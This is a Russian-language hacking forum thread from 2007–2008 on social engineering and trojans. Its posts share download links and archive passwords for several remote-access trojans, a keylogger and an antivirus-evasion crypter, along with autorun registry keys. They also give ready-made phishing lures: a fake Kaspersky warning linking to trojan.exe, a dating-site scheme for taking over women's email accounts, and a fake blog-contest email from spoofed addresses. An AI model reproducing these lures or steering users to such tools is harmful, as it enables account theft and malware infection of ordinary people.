Компьютерный форум NoWa.cc Здесь может быть Ваша реклама
Правила Форума
редакция от 22.06.2020
Портал .::2BakSa.WS::.
Вернуться   Компьютерный форум NoWa.cc > Компьютеры и Интернет > Интернет партизаны > Хакинг в глобальной сети WWW

Уважаемые пользователи nowa.cc и 2baksa.ws. У нас сложилось тяжёлое финансовое положение. Мы работаем для вас вот уже более 15 лет и сейчас вынуждены просить о помощи. Окажите посильную поддержку проектам. Мы очень надеемся на вас. Реквизиты для переводов ниже.
Webmoney Webmoney WMZ: 826074280762 Webmoney WME: 804621616710
PayPal PayPal_Email E-mail для связи по вопросу помощи
Кошелёк для вашей помощи YooMoney 4100117770549562
YooMoney Спасибо за поддержку!
Ответ
 
Опции темы Опции просмотра Language
Старый 19.07.2007, 12:36   #1
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
Question Социальная Инженерия и Трояны

ВНИМАНИЕ!!! ВСЯ ИНФОРМАЦИЯ НАХОДЯЩАЕСЯ В ЭТОЙ ТЕМЕ ДАНА ИСКЛЮЧИТЕЛЬНО ДЛЯ ОЗНАКОМЛЕНИЯ.

PS за применения данных програм есть статья УК, вся ответственнось за их использование ложится на ВАС а не администрацию ресурса.

В случее если Virustotal.com (24 в одном) нет под рукой..

Антивирусные сканеры:

1) Mini AV Scanner (19 антивирусов в одном.)

http://rapidshare.com/files/97972169/AVScan.part1.rar
http://rapidshare.com/files/98028365/AVScan.part2.rar
http://rapidshare.com/files/98031187/AVScan.part3.rar
Pass: activespy.org
Total size:
213 MB


2) ScanLix 1.0 (10 в одном)


http://usuarios.lycos.es/beto1234/ScanLix.rar
или рапида:
http://rapidshare.com/files/89857999...part1.rar.html
http://rapidshare.com/files/89867190...part2.rar.html
Total size:
147 MB
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось WeNZeeR; 04.04.2008 в 10:06..
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Эти 3 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 20.07.2007, 07:01   #2
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

sharK 2.2 - довольно неплохой бекдор, постоянные обнавления.

Скрин редактора сервера.


Серверная часть =>
Цитата:
c:\WINDOWS\system32\My_Server.exe

Примерный вес ~205 кб
Для авто запуска создаёт следующий ключ реестра.
Цитата:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAB9FD2E-D036-ED80-F641-BF10A05B109E}

Скачать можно тут.
rarpass: shark-project.net


GoodLuck 3.0.0.1 сам не юзал.
Скрин клиента.
[IMG]http://img469.**************/img469/2778/xsscn6.jpg[/IMG]
Скачать можно тут.

CRIMINAL-RAT ещё 1 новый трой в данный момент находится на стадии бета тестинга.

Скрин клиента

скачать можно тут.


один из методов развода.
Цитата:
Лаборатория Касперского и администрация @Mail.ru предупреждает:

О начале новой эпидемии вируса червя wormNAME, уже заражено более 1000000 компьютеров, не исключено что и ваш компьютер подвергся заражению, для лечения/удаления данной Интернет угрозы рекомендуем вам воспользоваться нашими продуктами, если же вы не зарегистрированный клиент то специально для вас была выпущена бесплатная версия антивируса Касперского скачать и установить её можно по этой ссылки[name.narod.ru/trojan.exe].

Если у вас установлена не лицензионная версия Антивируса Касперского то данное приложение работать не будет, для корректной работы бесплатной версии пиратскую необходимо удалить.

Спасибо за использование наших продуктов. С Уважением Лаборатория Касперского и Администрация @Mail.ru.

Это сообщение послано роботом, отвечать на него не нужно.

PS как отправить письмо с ящика [email protected] думаю все знают..
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось Deementor; 20.07.2007 в 09:24.. Причина: Добавлено сообщение
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Эти 4 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 20.03.2008, 14:34   #3
CheMax
Неактивный пользователь
 
Регистрация: 14.03.2008
Сообщений: 4
Репутация: 0
По умолчанию Ответ: Социальная Инжинерия и Трояны

PS как отправить письмо с ящика [email protected] думаю все знают..[/QUOTE]

нет, не все знают! а где я могу узнать?

PS токо можно чтоб втом месте где я смог бы узнать, обясняли на пальца весь процесс, а то на анти чате решил посмотреть, там не то что ламер, там крутой хак запутается!

и ещё... посоветуйте литературку каку нибуть где описано что такое сканер портов, как сканирывать IP, как настраивать эти проги, икак ваще ими пользоватся!

заранее спосибо за помощь!
CheMax вне форума
 
Ответить с цитированием Вверх
Старый 22.07.2007, 09:05   #4
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

Еще новинки, сам не юзал.

Molela 1.15 beta

Скачать можно тут

Marmoolak 1.17 (keylogger)

Скачать можно тут.

Программа для лечения антивирусов и файров.
Качаем тут + Сорсы

Hav-Rat 1.3.2 Beta тоже не плохой бекдор, покрайней мере привидущая версия..

Скачать можно тут.

Добавлено через 4 минуты
rarpass: havalito.com
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось WeNZeeR; 22.07.2007 в 09:09.. Причина: Добавлено сообщение
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Эти 3 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 22.07.2007, 13:20   #5
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

Итак Знакомимся с Девушками по "Хакерскому"
или пример того как можно вскрыть мыло..

1) поиск жертв, первое что нужно сделать это зайти на сайт знакомств, зарегистрироваться и вписать туда кривое мыло, если не хотите чтобы ваш ящик был забит средствами для увеличения полового члена, активировать не нужно а переписывается можно и с не активированным аккуантом, правда только 24 часа... но и этого должно хватить, далее находим пару десятков более менее симпатичных девушек и отправляем им сообщение вида:
---------------------------------------------------------------------------
Цитата:
Привет! меня зовут name, Студент, вот хочу познакомится, слушаю реп, Диму Билана и.т.д, занимаюсь бодибилдингом, люблю зверюшек, большие карие глаза, брюнет.. итд. icq: xxx-xxx-xxx
PS переписывается на сайте не могу , аккуант удалят через 24 часа... неправильно ввёл емаил.

PS: Туже инфу пишем в номере ICQ
---------------------------------------------------------------------------

Для быстрого поиска нажмите на "кнопку кто сейчас на сайте", чтобы не ждать 2 дня..

После того как девушка клюнула копируем её мыло и номер аси и тупо вставляем в Яндыкс/гугль для получение более подробной инфы, наверняка девушка уже засветилась на каком нить форуме,
рассказала о себе итд, в последующем разводе это может сильно пригодится, также соит посмотреть секретный вопрос на мыле, Например если вопрос как зовут твою собаку, можно прикинутся тренером животных

процент удачной рыбалки обычно составляет примерно 10% ... итак жертва клюнула. далее читаем

Я: ******
Она: ******0


Лог
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось WeNZeeR; 22.07.2007 в 14:51..
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Эти 4 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 22.07.2007, 18:03   #6
Deementor
ViP
 
Пол:Мужской
Регистрация: 17.09.2006
Сообщений: 1,182
Репутация: 1592
По умолчанию Ответ: Социальная Инжинерия и Трояны

Господа, аффтар жжет, каменты просто отпад.
Ждемс продолжение?
А вот и мой небольшой отчет, раз уж тема далеко в низ ушла http://www.nowa.cc/showthread.php?t=52431
Deementor вне форума
 
Ответить с цитированием Вверх
Старый 24.07.2007, 08:35   #7
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

Slh 3.0 FUD By oxiD
Pass : unkn0wn.eu
Скрин клиента.
[IMG]http://img155.**************/img155/1642/untitledjd4.png[/IMG]

Only McAfee detects : New Win32.g2 , на 07.07.2007
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось Deementor; 24.07.2007 в 12:01..
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Старый 25.07.2007, 22:44   #8
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

Цитата:
sharK 2.3 Released
24 July 2007 | 18:00 |

There we go, have fun with the new release canditate: sharK 2.3.0

Changelog (+ = New Feature; * = Bugfix):

[+] You can disable the splash screen
[+] Shark saves Width & Height of Serverwindow
[+] sharK can also use HKCU as mainstartup
[+] Change Last_Accessed/Modified/Creation Time in Folder/File Properties
[+] Download Folders (with Subfolders) with one mouseclick
[+] Panic Mode 3 for Blacklist: Cuts all Connections while specified Process is running!
[+] Better ETA-Calculation
[+] You can set images as Wallpaper
[+] Edit Blacklist Remotely
[+] Server-Builder saves settings till ending shark (even when closing server-builder-dialog)
[+] Complete Thumbnail View
[+] Automaticially Sort Transfer Queue (New Transfers to the Top etc)
[+] Server perfoms Install-Events even when already installed
[+] External Window for Screencap/Webcam Cap (optional)
[+] Custom Installdir
[+] Melt Server
[+] Disclaimer added
[+] Improved Server-Builder
[+] Hold External Windows on Top
[+] Hide Transer-Queue when minimized to systray
[+] Ask before Removing Server/Clear Offlog
[+] Offlog-Parser with Progressbar
[+] Optimizing the Transfer-Code once again for more speed
[+] Server changes also Last_Access and Last_modified date to Creation-Time
[*] Save_Screen/CamShots are not checked automaticially[*] You cannot "flood" the server with nullstring-messages in C2C Chat[*] Server transfers wrong clientindex to plugins on received-file[*] Sometimes sharK displays wrong OS

Скачать можно тут, пароль на архив тотже.

Добавлено через 3 минуты
Xhacker 3.0

PS Скрины можно посмотреть на офф сайте.
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось WeNZeeR; 25.07.2007 в 22:47.. Причина: Добавлено сообщение
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Старый 27.07.2007, 09:39   #9
Tigrik
Пользователь
 
Аватар для Tigrik
 
Регистрация: 31.03.2007
Адрес: Киев
Сообщений: 88
Репутация: 501
По умолчанию Ответ: Социальная Инжинерия и Трояны

Может не совсем в тему , но вот как один кадр пытался применить соц. инженерию на форуме ххххх (люди там в основном не глупые) :

подробности тут

З.Ы. Если что сорри за офтоп , и можете преместить в раздел юмор.
__________________
Нет предела совершенству

Последний раз редактировалось Deementor; 27.07.2007 в 11:24..
Tigrik вне форума
 
Ответить с цитированием Вверх
Эти 3 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 27.07.2007, 11:29   #10
Deementor
ViP
 
Пол:Мужской
Регистрация: 17.09.2006
Сообщений: 1,182
Репутация: 1592
По умолчанию Ответ: Социальная Инжинерия и Трояны

Tigrik, +1
Прочитал.
Сильно улыбнуло. Чуть под столом не потерялся. Спасибо за поднятое настроение. Думаю, день будет веселым. )))
Если дело и дальше так пойдет, то придется создавать тему: "Хацкеры - ржу нимагу"
Deementor вне форума
 
Ответить с цитированием Вверх
Эти 3 пользователя(ей) сказали cпасибо за это полезное сообщение:
Старый 28.07.2007, 12:18   #11
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

TheRat 7.0 XP


Качаем тут, трой был взят с не совсем надёжного источника поэтому тест только на VMware.

rarpass: prologic.ws
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось DCRM; 25.09.2007 в 20:58..
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Старый 26.08.2007, 14:21   #12
Lansp
Неактивный пользователь
 
Аватар для Lansp
 
Регистрация: 26.02.2007
Сообщений: 4
Репутация: 1
По умолчанию Ответ: Социальная Инжинерия и Трояны

WeNZeeR,
TheRat 7.0 XP к ней должен быть ключик, иначе она видна
т.е. предупреждает о мониторинге системы...
И ещё вопросик:
Что значит "трой был взят с не совсем надёжного источника поэтому тест только на VMware"?
У создателей этого крысюка свой сайт есть можно почитать про эту прогу.

Последний раз редактировалось Lansp; 26.08.2007 в 14:37..
Lansp вне форума
 
Ответить с цитированием Вверх
Старый 01.09.2007, 23:37   #13
DCRM
Постоялец
 
Аватар для DCRM
 
Пол:Мужской
Регистрация: 03.11.2005
Адрес: Annuit Cœptis
Сообщений: 302
Репутация: 424
Post Ответ: Социальная Инжинерия и Трояны

Цитата:
Сообщение от Lansp Посмотреть сообщение
WeNZeeR,
TheRat 7.0 XP к ней должен быть ключик, иначе она видна
т.е. предупреждает о мониторинге системы...
И ещё вопросик:
Что значит "трой был взят с не совсем надёжного источника поэтому тест только на VMware"?
У создателей этого крысюка свой сайт есть можно почитать про эту прогу.

А то и значит что в трое ещё сюрприз может быть приклеен) так что ТОЛЬКО на ВМ(Виртуальных Машинах) тестируем
__________________
This world is very interesting, it feels free, but this freedom must be hacked. (с)
DCRM вне форума
 
Ответить с цитированием Вверх
Старый 02.09.2007, 22:09   #14
cmex
Неактивный пользователь
 
Пол:Мужской
Регистрация: 02.09.2007
Сообщений: 16
Репутация: 0
По умолчанию Ответ: Социальная Инжинерия и Трояны

Как в этой проге Turkojan 3.0 Private Edition настроить порты?проверил на себе - не видит сервера - проверил порт - говорит ошибка!Как открыть порты нормально чтобы работало?
cmex вне форума
 
Ответить с цитированием Вверх
Старый 01.08.2007, 19:57   #15
WeNZeeR
Постоялец
 
Аватар для WeNZeeR
 
Пол:Мужской
Регистрация: 14.12.2006
Сообщений: 546
Репутация: 576
По умолчанию Ответ: Социальная Инжинерия и Трояны

Dark Data RAT (Взято с офф сайта)
[IMG]http://img106.**************/img106/9925/troy1zw6.gif[/IMG]
Примерный вес сервера:
Цитата:
401,408 bytes
Клеется/создаёт к файлу
c:\WINDOWS\system32\zlib.dll
вес: 53,248 bytes

Скачать можно тут.

Unclear RAT 2.2.1 (Взято с офф сайта)
[IMG]http://img513.**************/img513/981/troy2yy5.gif[/IMG]
Примерный вес сервера: 77,824 bytes
скачать можно тут
rarpass: dark-data.co.nr

Turkojan 3.0 Private Edition (вроде всё норм)
[IMG]http://img230.**************/img230/769/troy3te6.gif[/IMG]
Примерный вес сервера: 303,104 bytes
Скачать можно тут.
rarpass: www.bifrostworld.com

Hav-RAT 1.3.0 (Private) (По повуду источника неуверен, тест только на VMware)
[IMG]http://img509.**************/img509/3729/troy4eq0.gif[/IMG]
[IMG]http://img509.**************/img509/1999/troy5ec2.gif[/IMG]

Сервер создаёт/клеется к файлам:
Цитата:
c:\WINDOWS\system32\orb32wvx\rhb32swo.exe Примерный вес: 34,128 bytes
c:\Documents and Settings\%user%\Local Settings\Temp\IXP000.TMP\gncbdg.exe
Примерный вес: 34,128 bytes

Автозапуск(если чесно я такого там неувидел...):
Цитата:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5B7AC5A1-6568-13F1-261B-67911AF4B4D8} "stubpath"
data: C:\WINDOWS\System32\orb32wvx\rhb32swo.exe s

Скачать можно тут.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Вот пример взлома мыла с помощью онлайн блога(liveinternet.ru).
Под средством:

Цитата:
_http://amail.h15.ru/

или

Цитата:
_http://void.ru/?do=cgifun&item=emsend

Отправляем жертве текст вида:
----------------------------
ТЕМА: Итоги конкурса на лучший блог.
Цитата:
Здравствуйте по итогам конкурса проведённого в этом месяце
ваш блог был выбран одним из лучших и занял 147 призовое место,
Вы выиграли специальный VIP статус для своего блога, пользователи
с таким статусом выделяются в особую звёздную рамку, c
её помощью о вашем блоге узнают ещё больше людей.

Буквально в течении 10 минут к вам в icq(тот что вы указали при регистрации)
обратится один из организаторов конкурса на лучший блог,
вот его icq номер: XXXXXX

С уважение администрация LiveInternet.ru
это письмо было посланно роботом и отвечать на него не нужно.

---------------------------
PS: это было нужно для того чтобы невызвать лишних подозрений.
PS/2: XXXXXX по моему опыту чем меньше цифр тем больше верят.
PS/3: желательно использовать следующите адреса

[email protected]
[email protected]
[email protected]


Готовые вопросы.

PS лога к сожелению нет,нечаяно делитнул в месте с номером..
__________________
Sometimes the life chooses for us..
Если человек идиот он должен знать об этом. (c) me

Последний раз редактировалось DCRM; 25.09.2007 в 20:57.. Причина: +hide
WeNZeeR вне форума
 
Ответить с цитированием Вверх
Эти 2 пользователя(ей) сказали cпасибо за это полезное сообщение:
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социальная справедливость LOTR Что ожидает человечество и почему ? 153 01.02.2015 00:17
Николай Дягтерев: Генная инженерия и Клонирование shum29 Популярно о медицине / Нетрадиционная медицина 4 21.03.2010 23:23
>>Обсуждаем трояны!<< Mihanus Интернет партизаны 39 08.04.2008 10:13
Список портов, которые используют трояны. lastmylove Безопасность 0 15.01.2007 16:44

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 18:38. Часовой пояс GMT +3.


Copyright ©2004 - 2024 2BakSa.WS

Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
Время генерации страницы 0.30617 секунды с 11 запросами